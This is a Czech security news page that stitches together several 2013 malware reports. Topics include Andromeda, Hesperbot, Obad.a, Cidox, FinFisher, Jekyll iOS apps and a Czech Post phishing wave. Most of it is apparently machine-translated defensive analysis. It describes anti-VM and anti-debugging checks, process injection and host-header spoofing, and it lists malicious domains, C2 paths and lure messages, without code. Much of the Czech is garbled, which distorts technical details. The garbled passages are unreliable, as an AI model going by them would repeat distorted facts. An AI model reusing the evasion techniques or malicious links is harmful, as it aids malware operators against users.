Pokud potřebujete použít RDP a jsou více technicky nakloněn, můžete změnit port, na kterém RDP " naslouchá " pro připojení (výchozí port je 3389 ) . Microsoft má článek o tom, jak to v mnoha verzích systému Windows. Najdete zde také řadu možných řešení diskutovaných na přetečení zásobníku .
A na téma vzdálené plochy podporu , zůstat ve střehu, pro ty "Podpora systému Windows ", lidi, kteří telefon a zeptat se vás na instalaci speciálního software pro vzdálený přístup , aby mohli " opravit " počítač. Padající pro tento podvod může skončit špatně. Pro více informací o to, podívejte se na článek David Harley zde .
Příspěvek Remote Desktop ( RDP ) Hacking 101: Vidím svůj desktop od tady! se objevil na prvním místě Žijeme zabezpečení.
Andromeda Botnet se skrývá za AutoIt 14.9.2013 BotNet | Viry
Minulý měsíc jsem zveřejnil blog o zvýšení využívání AutoIt skript malware autorů provádět škodlivé aktivity. Útočníci používají AutoIt skripty po dlouhou dobu, a které jsou stále oblíbenější díky své flexibilní a silné povahy. Nyní jsme narazili další kus malware (který dopadá být součástí botnetu Andromeda) kompilována s AutoIt vykonat svůj škodlivý kód. Botnet využívá AutoIt skript skrýt své škodlivý kód a spustí kód pomocí AutoIt je API. Exe2Aut Program umí extrahovat obsah hlavního binárního souboru, jak je ukázáno níže: anrdomeda_autoit_decode Jak je uvedeno výše, skript je snadné pochopit, a klesne zdrojový soubor obsahující kód skriptu a dva vložené soubory-a.vbs a f.txt-, jejichž obsah je uveden níže: andromeda_files_dropped Vypadají jako jednoduché textové soubory. Skript kapky kopii sebe sama ve start-up firem s názvem config.exe. To zkopíruje klesl soubory do dočasné složky a spustí a.vbs, který obsahuje base64 řetězec a kód na dešifrování. Po proveden, bude malware klesne jiný soubor, ensambla.txt, ve složce Temp. Skript volá DllStructCreate (), která vytvoří strukturu podobnou ve stylu C / C + + pro použití v DllCall () pro f.txt a ensambla.txt. Skript spustí další dvě lokální proměnné, které obsahují binární data pomocí Execute (BinaryToString ()). Pojďme se pop-up ty proměnné pomocí AutoIt MsgBox () funkce vidět skutečný kód: andromeda_varibales Skript nastaví data DLL strukturu a provádí DLL proceduru pomocí AutoIt je DllCall () funkce. Soubor f.txt obsahuje "MZ" záhlaví, škodlivý kód, který se ukázal být nový Andromeda botnet vzorek. (Několik nedávných blogy vztahuje Andromeda, jeden z nich publikoval pěkný rozbor.) kód z publikovaných blogů vypadá velmi podobný našemu snížil souboru, ale různé CRC32 hashe pro názvy procesů, na začátku kódu přitáhl mou pozornost. Po nějaké analýze se ukázalo, že varianta Andromeda používáte vlastní algoritmus pro generování hash pro názvy procesů, jak je uvedeno níže: andromeda_custom_hash_algo Na začátku, binární kontroluje název mutex "lol", shromažďuje běh názvy procesů, vypočítá hash pomocí vlastního algoritmu, a porovnává je s natvrdo kódovaných hash. Našel jsem několik zjevných názvy procesů, ale ne všechny. (Já bych rád poděkoval kolegovi Subrat sarkar, který rychle napsal utilitku na základě předchozího algoritmu je mi vlastní hash pro názvy procesů, jak je ukázáno níže.: andromeda_custom_hash_utility Hádat všechny názvy procesů spolu s natvrdo kódovaných hash ručně by být špatný nápad. Takže myšlenka je shromáždit všechny Antimalware nástroje, VMware / VirtualBox / Sandboxie, a další jsou analytické nástroje názvy procesů, generovat a porovnat hodnoty hash. To nám pomůže určit všechny názvy procesů, tento binární hledá. Tak jsem rychle napsal skript v Perlu pro generování hash všech kandidátů, jak je uvedeno níže: andromeda_perl_hash_output Byl jsem schopen získat všechny názvy procesů používaných v této binární. Všechny pevný kódované hashe odpovídají názvy procesů, uvedených níže: andromeda_all_process_names Není-li odpovídající proces nalezen, pak to bude kontrolovat sbiedll.dll Sandboxie je. andromeda_sbiedll_check Andromeda trik nepodaří Byl jsem si vědom proti VMware a antidebugging trik používá Andromedy. Zkontroluje, zda používáte virtuální stroj tím, že hledá klíče pod "System \ CurrentControlSet \ Services \ disk \ enum" klíč registru a pak dělá řetězec odpovídající a načasování zkontrolovat pomocí "rdtsc" návod na antidebugging. Ale oba triky nepodařilo pro tento binární. Podívejme se proč. andromeda_failed_checks Trik použít k získání řetězec "vmaw", "vbox" nebo "qemu" se nezdaří, protože VMware 9 má jinou strunu v registru. Tak EAX 8 nepodaří získat požadované řetězec. I když se zjistí, trik "awmv" (opak "vmwa"), pro starší verze VMware, zkontroluje pomocí "61776D77", což v přepočtu na znaky se stane "awmw." Pevně hex řetězec je špatně v tomto případě ( protože poslední byte, 77, je v pořádku). To by mělo být "61776D76," což v přepočtu na znaky se "awmv." Binární obsahuje antidebugging kód pomocí rdtsc instrukci, která nemá instrukce skoku pro ukončení (takže můžete pokračovat v analýze bez obav). Jsem nebyl přesvědčen o těchto neúspěšných kontrol a myslel tyto nedostatky by mohla existovat pouze pro tuto konkrétní binární. Křížové kontroly Prohlédl jsem si několik vzorků generovaných Andromeda 2,06 stavitel (unikly na internetu) a našel všechny tyto nedostatky existují ve všech binárních souborů. Jakmile se obejít všechny antireversing triky, binární volá hlavní náklad, který vytváří proces Wuauclt.Exe Windows (Windows Update) v prašném režimu, jak je uvedeno níže: andromeda_createprocess Před tím, malware používá následující rozhraní API systému Windows k vytvoření různých sekcí a mapovat pomocí škodlivého kódu. andromeda_section_mapping Zajímavé je, že binární pak vstřikuje nějaký kód na vstupním bodu Wuauclt.Exe. Zde je kód injekce: andromeda_injected_code Binární vstřikuje "PUSH 000A13B9, ret" instrukce. Takže když se nazývá ZwResumeThread (), bude Wuauclt.Exe tlačit adresy "000A13B9" na zásobníku a zpět. Tímto způsobem škodlivý kód, bude spuštěn v kontextu Wuauclt.Exe procesu Windows, je uvedeno níže: andromeda_run_payload Řídicí server, je stále aktivní v době psaní tohoto blogu. Útočníci používají AutoIt skripty skrýt a nainstalovat škodlivý náklad. Tento příklad ukazuje, že AutoIt má snadný a účinný API pro spuštění škodlivého kódu. Vzorek Andromeda jsme analyzovali také nám ukazuje celou řadu metod používaných útočníky, včetně vlastní hash generace pro názvy procesů, anti-VMware/antidebugging technik a procesu vstřikování.
Hesperus (Evening Star) září jako posledního "Banker" Trojan
6.9.2013 Kriminalita | Viry
Hesperus nebo Hesperbot, je nově objevená bankéř malware, který krade informace o uživateli, zejména on-line bankovnictví pověření. Ve funkci je podobná jako u jiných "bankéřů" v přírodě, zejména Zbot. Hesperus znamená Večernice v řečtině. Je velmi aktivní v Turecku a České republice a pomalu se šíří po celém světě. Tento sofistikovaný malware používá z různých modulů pro zvláštní účely, vstřikuje HTML skripty na bankovní související webové stránky, ukládá všechny moduly a data v šifrované podobě, šifruje svůj konfigurační soubor, používá šifrovací algoritmus Twofish s HMAC-SHA512 křížkem, zaměstnává WinScard. dll číst čipové karty, a komunikuje s jeho ovládání serveru přes SSL. To také používá současnou standardní technikou vstřikování celý svůj kód do Attrib.exe a pak do explorer.exe. Proto její komunikace se zdají být z legálního souboru explorer.exe. Analyzovala jsem nedávno binární kompilované 2. září, a shledal, že jeho řídicí server, je velmi aktivní. Hlavní aplikace na zakázku balení. Po rozbalení obsahuje řetězec naznačující dropper_x86.bin je jeho původní jméno: MD5: 72AD2AF02C98068DE5FD9F9AE2C5B750. Zpracoval Datum: Pondělí 02.9.2013, 11:18:20 Dropper_x86.bin obsahuje dva binární soubory specifické pro operační systém: Core_x86.bin pro 32-bit OS. MD5: 524C3F6F5D6968557AB000B920D42D9E. Zpracoval Datum: Pondělí 02.9.2013, 10:46:05 Core_x64.bin pro 64-bit OS. MD5: 5D7E115CD6269FDDFB75AE76E5D5221A. Zpracoval Datum: pondělí 2.09.2013, 10:46:16 - 64 Bit EXE Tyto binární soubory mají jednu funkci exportu, "_hesperus_core_entry", tedy bot jméno. Následující řetězce navrhnout možné zeměpisné umístění na infekce: botnet Hlavní binární vybalení kód: dešifrování Tento kód se spustí Attrib.exe v zavěšeném stavu a vstřikuje jeho kód. Padne několik souborů do adresáře% APPDATA%. Jako DAT a souborů. BKP. Informace o uživateli, jako je název počítače / uživatelské jméno, šifrovací klíč, hlavní binární soubor, stažených škodlivých modulů a konfiguračního souboru jsou uloženy v jiném. DAT. K. BKP soubory jsou záložní soubory. Souborů dat. dir Data v. DAT a. Soubory BKP je šifrována pomocí šifrovacího algoritmu Twofish s HMAC-SHA512 křížkem. HMAC Po aplikaci injekce kódu do explorer.exe, malware se připojí k jeho ovládání serveru pomocí protokolu HTTPS se vyhnout obecné Antimalwarový detekci. Její komunikace zdánlivě přijde z legitimních systémového souboru explorer.exe. Kromě toho, že názvy domén kontrolních serverů se zdají být oprávněné domény WHOIS služby požádá. Používání validního SSL provoz je malware ještě těžší odhalit. Použití SSL, Trojan stáhne další škodlivé moduly z jeho ovládání serveru. Ty se používají pro skrytí Virtual Network Computing, a keylogging, obrazovky rekordér, čtečka karet Smart Card, zásuvka bezpečný protokol proxy server, atd. Tyto moduly jsou: hvnc_mod_x86.mod keylog_mod_x86.mod sch_mod_x86.mod socks_mod_x86.mod Malware komunikuje s ostatními důvěryhodných webech, jako je google.com, facebook.com, wikipedia.org, atd. síť Přidružené domény Control Server: Whoischeck.biz spolehlivé, dns.co.uk 91.213.233.197 Další varianta ke stažení další malware z jiné adresy a shromažďuje a odesílá adresy uživatelů e-mailu na ptcliente.org / GR-mail / tr-mail.php. MD5: A79D1E01A05C262DC0A8DA5C577CAF89. Zpracoval Datum: čtvrtek 29 srpen 2013, 09:01:08 tr Další varianta (MD5:. 4107E4C91B197C483C320DA13EF27F95 Zpracoval Datum: pondělí 2.09.2013, 11:12:21) posílá infekce informací pomocí POST na identity-check.org/nlog/nlog.php.
Zákeřný virus cílí na české uživatele. Snaží se jim vysát peníze z bankovních účtů.
5.9.2013 Viry | Kriminalita
Už od začátku minulého měsíce republikou kolují podvodné e-maily, ve kterých se počítačoví piráti vydávají za zaměstnance České pošty. Prostřednictvím odkazů v nich se šíří škodlivý trojský kůň, s jehož pomocí se snaží počítačoví piráti získat přístup k cizím bankovním účtům. E-maily se objevily také v Portugalsku, Turecku a Velké Británii, varovali ve čtvrtek zástupci Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.
Zvětšit obrázek FOTO: Ondřej Lazar Krynek, Novinky Dnes 16:53 „Jedná se o rozsáhlou akci, při které jsou ve čtyřech evropských zemích zneužívány etablované společnosti, jejichž jménem je šířen nový a velmi sofistikovaný trojský kůň,“ uvedl bezpečnostní analytik Pavel Bašta z týmu CSIRT.
„Win32/Spy.Hesperbot je velmi silný bankovní trojský kůň s mnoha 'užitečnými' funkcemi, jako je logování zmáčknutých kláves, vytváření screenshotů a nahrávání videa. Dokáže také spustit vzdálenou proxy, vytvořit skrytý VNC server umožňující vzdáleně ovládat infikovaný počítač,“ konstatoval Bašta.
Podvodný e-mail Podvodný e-mail FOTO: CSIRT
Podle něj jsou útočníci velice vychytralí a k penězům na účtu se dokážou dostat i přes potvrzovací SMS. „Cílem útočníků je získat přihlašovací údaje do bankovních účtů obětí a zároveň je donutit k instalaci dalšího malwaru na jejich Android, Symbian, či Blackberry telefony,“ prohlásil bezpečnostní analytik z týmu CSIRT.
Pokud se jim podaří infikovat také mobil, mají vyhráno. V cestě k penězům na bankovním účtu jim už nic nebrání.
Nevyžádané zprávy se začaly v Česku objevovat na začátku srpna. „V předmětu e-mailu je uvedeno ‘Informace o Vaší zásilce‘, v těle pak text o nedodání zásilky a upozornění na sankce,“ uvedla mluvčí České pošty Marta Selicharová s tím, že virus se do počítače dostane poté, co uživatel klikne na podvržený odkaz ve zprávě.
Podvodný e-mail jde poznat podle adresy Podle ní je podvodný e-mail odesílán z adresy cpost@ceskaposta.net nebo cpost@ceska-posta.net. Pošta ale informace o zásilkách rozesílá z adresy ceskaposta@cpost.cz. Zatímco v první vlně bylo na první pohled možné podvodný e-mail rozeznat podle pravopisných chyb a špatné diakritiky, aktuální kampaň je již zdařilá a méně pozorní uživatelé se mohou snadno nechat napálit.
„E-maily z uvedených adres nemají s Českou poštou nic společného, pokud by na ně kdokoli reagoval, hrozí mu riziko zavirování PC škodlivým kódem, takzvaným trojským koněm,“ uzavřela Selicharová s tím, že na poštu se již kvůli podvodné zprávě obrátily stovky lidí.
Pošta již dříve kvůli podvodným e-mailům podala trestní oznámení na Policii ČR na neznámého pachatele. Pokud se lidé setkají s podvodnou zprávou, pošta žádá o přeposlání na adresu info@cpost.cz.
Obad.a Trojan nyní distribuován přes mobilní botnety
5.9.2013 Blog Viry | Mobilní
Zdroj: Kaspersky
Na konci května jsme se hlásil o podrobnostech Backdoor.AndroidOS.Obad.a, nejvíce sofistikovaný mobilní Trojan k dnešnímu dni. V té době jsme měli téměř žádné informace o tom, jak tento kus malware dostane do mobilních zařízení. Od té doby jsme zkoumali, jak je distribuován Trojan a zjistil, že malware se majitelé vyvinuli techniku, která jsme nikdy nesetkali. Poprvé malware je distribuován pomocí botnetů, které byly vytvořeny pomocí zcela jiný mobilní malware.
Zatím jsme objevili čtyři základní metody používané k distribuci různých verzí Backdoor.AndroidOS.Obad.a.
Mobile Botnet
Nejzajímavější z těchto metod jsou ty, kde se Obad.a distribuovány spolu s jiným mobilním Trojan - SMS.AndroidOS.Opfake.a. To bylo nedávno popsáno v blogu VOM v škodlivými přílohami . Dvojitá infekce Pokus začíná, když uživatel získá textovou zprávu, která obsahuje následující text:
"Zpráva MMS byla doručena, stáhněte si z www.otkroi.com".
Pokud uživatel klikne na odkaz, který obsahuje soubor s názvem mms.apk Trojan-SMS.AndroidOS.Opfake.a je automaticky načten do smartphonu nebo tabletu. Malware nelze nainstalovat, pokud uživatelé spusťte jej. Pokud k tomu dojde, C & C serveru pokyn Trojan vyslat následující zprávu všem kontaktům oběti v adresáři:
"Máte novou zprávu MMS, stažení na - http://otkroi.net/12"
V návaznosti na odkaz automaticky načte Backdoor.AndroidOS.Obad.a pod jmény mms.apk nebo mmska.apk.
Rozsah této činnosti jasně ilustruje dat, která jsme získali od předního ruského mobilního operátora, který zjistil masovou distribuci škodlivých textové zprávy ve své síti. V prostoru pěti hodinách bylo 600 zprávy odeslané s jedním z Trojan-SMS.AndroidOS.Opfake.a úprav. Ve většině případů dodávka byla prostřednictvím infikovaných zařízení, zatímco předtím v podobných distribucí používá SMS brány. Současně, jen několik zařízení infikované Trojan-SMS.AndroidOS.Opfake.a distribuován odkazy na Backdoor.AndroidOS.Obad.a, takže jsme mohli konstatovat, že tvůrci nebezpečné Trojan pronajmout část mobilní botnet šířit jejich duchovním.
Kaspersky Lab údaje za pokusí nainstalovat Backdoor.AndroidOS.Obad.a blokovaných aplikací Kaspersky Internet Security pro Android také podporuje tento předpoklad. Téměř každý graf ukazuje strmý nárůst počtu útoků.
Tento bodec v instalačních pokusů je typický verzí Backdoor.AndroidOS.Obad.a, které jsou rozesety pomocí spamových zpráv. Tyto vrcholy jsou výsledkem použití třetích stran botnet zdroje - mobilní zařízení napadeny jiným malwarem. To znamená, že majitelé Backdoor.AndroidOS.Obad.a nejen velet vlastní software šířit sám, ale také využít trojských koní provozované jinými zločinci.
Tradiční SMS spam
Nejstarší verze Backdoor.AndroidOS.Obad.a bylo dodáno tímto způsobem, a zprávy spam textu jsou stále základní způsob doručování Trojan do mobilních zařízení. Například pod názvem DOLG.INFO poslali textovou zprávu s následujícím obsahem:
"Vy jste v prodlení. Podívejte se zde - http://dolzniki.info/1 »
Když uživatelé klikli na odkaz, byl soubor s názvem mms.apk obsahující Backdoor.AndroidOS.Obad.a automaticky načteny na svých mobilních zařízeních. Nicméně, k instalaci malwaru uživatelé měli spustit soubor sami.
Google Play falešný obchod
Další velmi populární způsob, jak distribuovat mobilní trojské koně, včetně Backdoor.AndroidOS.Obad.a, je umístit malware ve falešných aplikací obchodech. Zpravidla tvůrci takových obchodů zkopírovat Google Play oficiální obsah a náhradní spojení na legitimních žádostí o ilegálních. Je snadné narazit na falešné, s Vyhledávače často směrují návštěvníky do pochybných obchodů.
Na obrázku výše je uživatel vyzván, aby stáhnout a nainstalovat populární mobilní hru, přijímat pouze kus malware, v tomto případě - Backdoor.AndroidOS.Obad.a. Objevili jsme dvě lokality, které distribuují úpravy Trojan: p1ay-goog1e.mobi a p1aygoog1e.com.
Přesměrování z prasklých míst
Pachatelé také bezva legitimní stránky, aby bylo možné přesměrovat uživatele na jiné stránky. Ve většině případů jsou návštěvníci přesměrováni změnou htaccess.:
A občas přidáním škodlivého kódu do lokality JS skripty:
V případě Backdoor.AndroidOS.Obad.a, cílem je infikovat mobilní uživatele. Pokud se potenciální oběť vstupuje do stránky ze svého domácího počítače, není přesměrování, ale majitelé mobilních zařízení (bez ohledu na to, co oni používají OS) se na jednu z následujících stránek:
Celkem jsme objevili 120 popraskané webových stránek, které uživatelé mobilních telefonů přesměrované na nbelt.ru, kde našli stránky, jako je tento. Po kliknutí na libovolné místo na stránce, mobilní zařízení stáhnout Backdoor.AndroidOS.Obad.a.
Závěr
V uplynulých třech měsících jsme zjistili 12 verze Backdoor.AndroidOS.Obad.a. Všichni měli stejné funkční sadu a vysokou úroveň kódu mlžení. Každý používal OS Android zranitelnost, která umožňuje získat malware DeviceAdministrator práva a dělal to podstatně složitější odstranit. Informovali jsme Google o to, jakmile jsme zjistili, takže chyba byla uzavřena v novém Android 4.3. Bohužel, tato verze je nyní k dispozici na omezený počet nových smartphonů a tabletů - zařízení, která používají dřívější verze platformy jsou stále v ohrožení. Nicméně, nejnovější verze KIS pro Android 11.1.4 odstranit Backdoor.AndroidOS.Obad.a z libovolné verze Android navzdory přítomnosti zranitelnosti.
Také jsme zjistili, že Trojan se většinou nacházejí v zemích SNS. Více než 83% infekčních pokusů Backdoor.AndroidOS.Obad.a byly pozorovány v Rusku. Stejné Trojan byl také zjištěn v mobilních zařízeních v Kazachstánu, Uzbekistánu, Běloruska a Ukrajiny.
Majitelé Backdoor.AndroidOS.Obad.a musí se rozhodl kout železo, dokud je horké, takže jsou pomocí tradičních i zcela nové přístupy. Setkali jsme se vůbec první případ, kdy jsou mobilní botnety slouží k distribuci mobilního Trojan, který prokáže, že počítačoví zločinci stále přizpůsobovat a aktualizovat své infekci techniky. Hrozba Backdoor.AndroidOS.Obad.a zůstává velmi reálná.
Malware autoři Zaměstnávat Variety se vyhnout zabezpečení detekce
4.9.2013 Viry
McAfee Labs blogu jsme se zabývali mnoho technik, které používá malware vyhnout kód založený na detekci. V mém předchozím blogu jsem se zmínil postup prolog a epilog procedur techniky obejít bezpečnostní systémy . Nedávno jsme narazili na jednu sadu fake-výstražných vzorků, které používají různé techniky se vyhnout odhalení. Tato technika se týká dynamického zatížení knihovny za běhu. Dynamické načítání Dynamické zatížení je mechanismus, kterým se program načte knihovnu do paměti za běhu, aby se adresy funkcí a proměnných obsažených v knihovně mohou být provedeny, nebo přístup. Dynamické zatížení se provádí pomocí API LoadLibrary, která přebírá řetězec argument (název knihovny má být načten). Následující obrázek je typický LoadLibrary kód s argumentem.
Legit_Way_Test Typický LoadLibraryExA API kód s argumentem. Předchozí model lze snadno identifikovat jak na chování a kódu založeného na detekci. To je důvod, proč vidíme různé způsoby předávání argument LoadLibrary API v některých fake-výstražných malware rodin. Následující screenshoty ukazují čtyři sady kódu, který slouží ke stejnému účelu přesunutí povinný argument do zásobníku. Kernel_1_Test První vzor pro pohyb argumenty. Kernel_2_Test Druhý vzor pro pohyb argumenty. Kernel_4_Test Třetí model pro pohyb argumenty. Kernel_3_Test Čtvrtý model pro pohyb argumenty. Malware autoři jsou vždy hledají nové techniky se vyhnout detekci, ale nakonec jejich techniky jsou objeveny a zablokován výzkumníky bezpečnosti. McAfee detekuje všechny varianty, které používají tyto techniky.
Cidox Trojan Vtipy HTTP Hlavička hostitele se vyhnout detekci
4.09.2013 Viry | Hacking
V poslední době jsme zaznamenali značný počet vzorků generujících nějaký zajímavý síťový provoz prostřednictvím naší automatizované rámce. Síť HTTP generovaný vzorek obsahuje několik zajímavých parametrů, názvy jako "AV" (a pro antivirus?) A "& vm =" (VMware?), Obdržíme jako odpověď se zdála být šifrována, což mě upozornil. Také všechny síťový provoz obsahoval stejný záhlaví hostitele ukazující na metrika.yandex.ru. Tyto vzorky se ukázalo být ve vztahu k Cidox Trojan rodiny. Zde je paket Wireshark zachycení požadavku GET: cidox_http_traffic Dalo by se okamžitě k závěru, že název hostitele v požadavku GET je viník a může být ohrožena, nebo je útočník doména, která není pro tento vzorek. Doména vypadal jako legitimní, protože yandex.ru je největší vyhledávač v Rusku. Chcete-li ověřit, rychle jsem zkontroloval zachycování paketů na žádost DNS a IP adresy (kde byl poslán požadavek GET), se liší od adresy IP metrika.yandex.ru. To mi říká, že hlavičky hostitele v požadavku GET je falešné a musí být pevně v těchto vzorcích. Viděli jsme tento trik používá nedávno malware autorů, v nichž jsou HTTP hlavičky hostitele falešnou poukázat na legitimní domén vyhnout detekci na základě hlaviček hostitele nebo vyhnout se výzkumníkům nebo automatizovaných nástrojů. Odpověď ze vzdáleného serveru byl šifrována, takže jsem se rozhodl podívat se do něj. Škodlivý binární používá vlastní balírny a nebylo těžké vybalit. unpack_data_mz Po vybalení můžete vidět několik zajímavých řetězce v binární níže: cidox_strings_unpacked Tento binární kontroluje, zda je vzorek běží pod VMware a také hledá antimalware služeb. Pamatujte si, že síťový provoz je uvedeno výše obsahuje "& vm =" a "& AV =" parametry. Můžeme uzavřít tento binární nastaví tyto parametry na základě předchozích kontrol. Mohl bych pokračovat dál a dál v tomto blogu, ale kvůli tobě se budu soustředit jen na několik důležitých položek. Binární začíná svou hlavní činnost podle způsobu procesu náhradní k přepsání paměti o probíhajícím procesu s nebezpečným spustitelný soubor. Binární vytváří "explorer.exe" proces pozastaven režimu a mapy paměti procesu s vlastním kódem, viz následující: cidox_create_process To pak spustí namapované binární kód s "ResumeThread" postupu. Binární další kapky několik souborů: dropped_explorer Stanoví klíč registru s hodnotou, která je cesta k DLL tak, aby každý proces pomocí User32.dll načte tuto knihovnu. Také to klesne některé konfigurační soubory v adresáři Cookies: dropped_cf_files Soubor CF je šifrována, a podíváme se na zašifrovaný soubor krátce, ale nejprve musíme vidět HTTP hlavičky generované tímto binární. Binární shromažďuje informace, jako jsou prohlížeče, operační systém, antimalware a VMware kontroly, verzi operačního systému (32 nebo 64 bit), atd. a připravuje požadavku HTTP GET. Zde je screenshot z požadavku GET záhlaví v procesu: cidox_get_request_header Jak jsme tušili, binární má pevně záhlaví hostitele, který ukazuje na metrika.yandex.ru, ale skutečná doména je odlišná. To může přijít z vynechaného šifrovaného konfiguračního souboru. Odpověď ze serveru jsou šifrovány takto: cidox_encryted_response Binární používá vlastní Tiny Encryption Algorithm (TEA) k šifrování a dešifrování dat. Zde byl hovor z dešifrovat odpověď ze serveru: cidox_tea_call TEA používá 128bitový klíč k šifrování a dešifrování své rutiny. Binární používá dva pevně klíče: jeden pro dešifrování dat pochází ze serveru a druhé uchovává data v zašifrované podobě, jak je uvedeno v předchozím obrázku. Je snadné zjistit Kódovací metoda založená na několika konstantní hodnoty zjištěné v algoritmu. Zde je snímek TEA kód: tea_decryption_code Po dešifrování odpovědi vyklube konfigurační soubor obsahující názvy domén, jak je vidět níže: cidox_decrypted_config Binární informace ukládá v zašifrované podobě v souboru cf, jak jsme viděli dříve. Binární stáhne a nainstaluje další škodlivý program z jiného serveru s názvem v konfiguračním souboru. Zde je požadavek: http_objects Žádost o dldc.php odešle zašifrovanou odpověď, která obsahuje jiný spustitelný soubor. dldc_exe Nebudeme zacházet do podrobností staženého binární. Útočník za tento trojan shromažďuje velké množství informací prostřednictvím požadavku GET, včetně Antimalware nebo VMware kontroly. Binární umožňuje detekci obtížné pro automatizované procesy nebo EZS nebo preventivní ochranné systémy, pomocí podvržené názvů hlavičky hostitele a vlastní Čaje pro šifrování dat. Jak jsme se dozvěděli, nemůžeme spoléhat pouze na hostitele záhlaví HTTP posoudit, zda název domény použitý v HTTP hlavicce je škodlivý.
FinFisher komerční spyware toolkit mobilu
04.09.2013 Viry
Existence FinFisher, komerční spyware toolkit vytvořen sídlem ve Spojeném království Gamma Group International, se v poslední době chytil pozornost veřejnosti, když se dva bezpečnostní výzkumníci z Toronta vydal výsledky analýzy FinSpy, modul, který je součástí sady nástrojů a se instaluje na PC. Vzorky pro analýzu byly poskytnuty dvěma prodemokratických aktivistů, kteří obdrželi bahrajnské je přes falešnými e-maily, a analýza ukázala, že FinSpy je velmi důkladná špionážní nástroj, který je schopen záznamu chatů, snímky obrazovek, klávesových zkratek, popadl další informace z infikovaných systémů a jejich předávání C & C servery zřízených útočníků po celém světě. Poté tento objev, Gamma Group uvedla, že neprodával žádné ze svých výrobků do Bahrajnu, a že tento vzorek výzkumníci obdrželi byl pravděpodobně odcizení nebo v důsledku reverzní inženýrství úsilí. Nyní titíž vědci - Citizen Lab bezpečnostní výzkumník Morgan Marquis-boire a Berkley počítačové vědy doktorand Bill Marczak - obdrželi vzorky, které prokázaly, že FinFisher má také složky, které mohou špehovat mobilní uživatele. Volal FinSpy Mobile, spyware záznamy hovory, textové zprávy, e-maily, stažené soubory, stisky kláves a audio zvuky přes mikrofon, zařízení 'je tiché hovory, výtažky seznamy kontaktů a používá GPS a mít přehled o poloze uživatele. Žádný mobilní uživatel bezpečné, jak se zdá, jako FinSpy Mobile je schopen ohrozit iOS, Android, BlackBerry, Windows Mobile a Symbian-run zařízení. Přesto může součást nelze nainstalovat bez zásahu uživatele, a vědci se domnívají, že cíle nakazit prostřednictvím sociálně technicky e-maily, Trojanized aplikace, nebo dokonce někdo, koho znají, který si stáhne a nainstaluje malware, aniž by uživatel věděl. "Doporučujeme, aby všichni uživatelé spustit anti-virus software, okamžitě aplikovat (legitimní) aktualizace, jakmile budou k dispozici, použijte obrazovku zámky, hesla a šifrovací zařízení (je-li k dispozici), "výzkumníci poradit . "Neutíkejte nedůvěryhodné aplikace a neumožňují přístup třetí osoby do mobilních zařízení."
Schvalovacím procesem App Store může projít malware
Tým výzkumníků z Georgijského technického institutu odhalil způsob, jak schvalovacím procesem aplikací pro Apple App Store propašovat malware.
Viry | Zabezpečení
Svůj výzkum pojmenovali „Jekyll apps“ a představili ho na 22. bezpečnostím symposiu USENIX v americkém hlavním městě. Zprávu také zveřejnili online jako PDF s názvem Jekyll na iOS: Když se neškodná aplikace stane zlou (Jekyll on iOS: When Benign Apps Become Evil).
„Naše metoda útočníkům umožňuje spolehlivě ukrýt zákeřné chování, které by jinak způsobilo zamítnutí aplikace během vstupního procesu,“ vysvětlil pětičlenný tým.
„Klíčovou myšlenkou je vytvořit aplikaci tak, aby se dala zneužít na dálku, změnit kód a dodatečně představit zákeřné řídící toky. Vzhledem k tomu, že nové řídící toky během schvalovacího procesu neexistují, mohou takové aplikace od Applu jednoduše získat schválení k distribuci pomocí App Store. Naši pokusnou aplikaci Jekyll jsme úspěšně zveřejnili na App Store a poté jsme na kontrolované skupině zařízení vzdáleně spustili útok. Výsledky ukazují, že nehledě na to, že byla aplikace uvnitř iOS sandboxu, mohla úspěšně provést mnoho zákeřných útoků – tajně rozesílat tweety, fotit, krást identifikační údaje nebo dokonce zneužít zranitelnosti jádra systému.“
Výzkumníci použili soukromé API, aby mohli zpřístupnit data uživatelů, třeba obsah jejich adresáře.
Jekyll byl založen na zpravodajské open source aplikaci News:yc, kterou výzkumníci doplnili o zranitelnosti a zákeřný kód a nastavili ji k připojení na jimi kontrolovaný server. Apple aplikaci schválil a vydal v březnu 2013 na dost dlouho, aby ji tým mohl stáhnout na svá vlastní zařízení. Poté ji rychle výzkumníci z obchodu stáhli, aby ji nenainstaloval někdo jiný.
Tom Neumayr, mluvčí Applu, řekl, že Apple na zprávu již reagoval a provedl potřebné změny. Aktualizace obsahující bezpečnostní vylepšení vydal Apple již v půlce března, tvůrci Jekylla však pochybují o tom, že by to bylo v reakci na jejich zneužití.
Takto škodlivé aplikace by podle nich nebylo možné rozpoznat bez důkladného prozkoumání zdrojového kódu.
Podle výzkumníků Applu zabralo pouze pár vteřin, než aplikaci zkontroloval a schválil k distribuci přes svůj obchod s aplikacemi. To vyvolává otázku, jaký jiný malware by se do App Storu mohl dostat, nebo jaký tam již je.
Apple oznámil, jak aplikace testuje. Standardní metodou by bylo spustit strojovou „dynamickou analýzu,“ při které je kód spuštěn ve virtuálním zařízení a zkontrolován.
Konkurenční Android čelí problémům s malwarem v Google Play celkem často, podle bezpečností společnosti Trend Micro bude na Androidu do konce roku k dostání milion zákeřných aplikací.
Novinka, že ani Apple není úplně neomylný při schvalovacím procesu, může podpořit hackery, aby se na tento OS zaměřili více, společnost tak bude muset svou bezpečnost vylepšit.
Kyberzločin: Android je jako mobilní Windows
Podle nového výzkumu se nejrozšířenější mobilní operační systém Android stal pro kyberzločince stejně populárním cílem útoků jako systém Windows v počítačích.
Mobil | Viry | Kriminalita
Bezpečnostní společnost Kaspersky Lab ve své poslední zprávě o vývoji malwaru mimo jiné uvedla, že Android, který používá téměř 80 % smartphonů, se pomalu vyrovnává nadvládě Windows v počítačích. Android se tak podle společnosti stává nejzajímavějším mobilním cílem útoků.
Rozdíl mezi malwarem pro Windows a Android je v tom, že druhý jmenovaný se rozvíjí mnohem rychleji, protože zločinci využívají svých zkušeností získaných za posledních 20 let ve světě osobních počítačů. „Vývoj malwaru pro Android probíhá mnohem rychleji, než tomu bylo v případě Windows,“ informoval Roel Schouwenberg, vrchní výzkumník Kaspersky Lab.
„Nejpovedenějším“ malwarem je prozatím Backdoor.AndroidOS.Obad.a, který společnost označila v červnu tohoto roku za prozatím nejdůmyslnějšího mobilního trojského koně. Dokáže například otevřít zadní vrátka pro stahování souborů, krást informace o telefonu a instalovaných aplikacích, odesílat SMS na prémiová čísla a šířit malware pomocí připojení Bluettoth.
Obad také využívá šifrování a zakrývání kódu, aby mátl antivirové analýzy. Navíc zneužívá tři nové slabiny Androidu. Kaspersky Lab po analýze kódu tohoto trojského koně dospěla k závěru, že se svou stavbou podobá malwaru pro Windows.
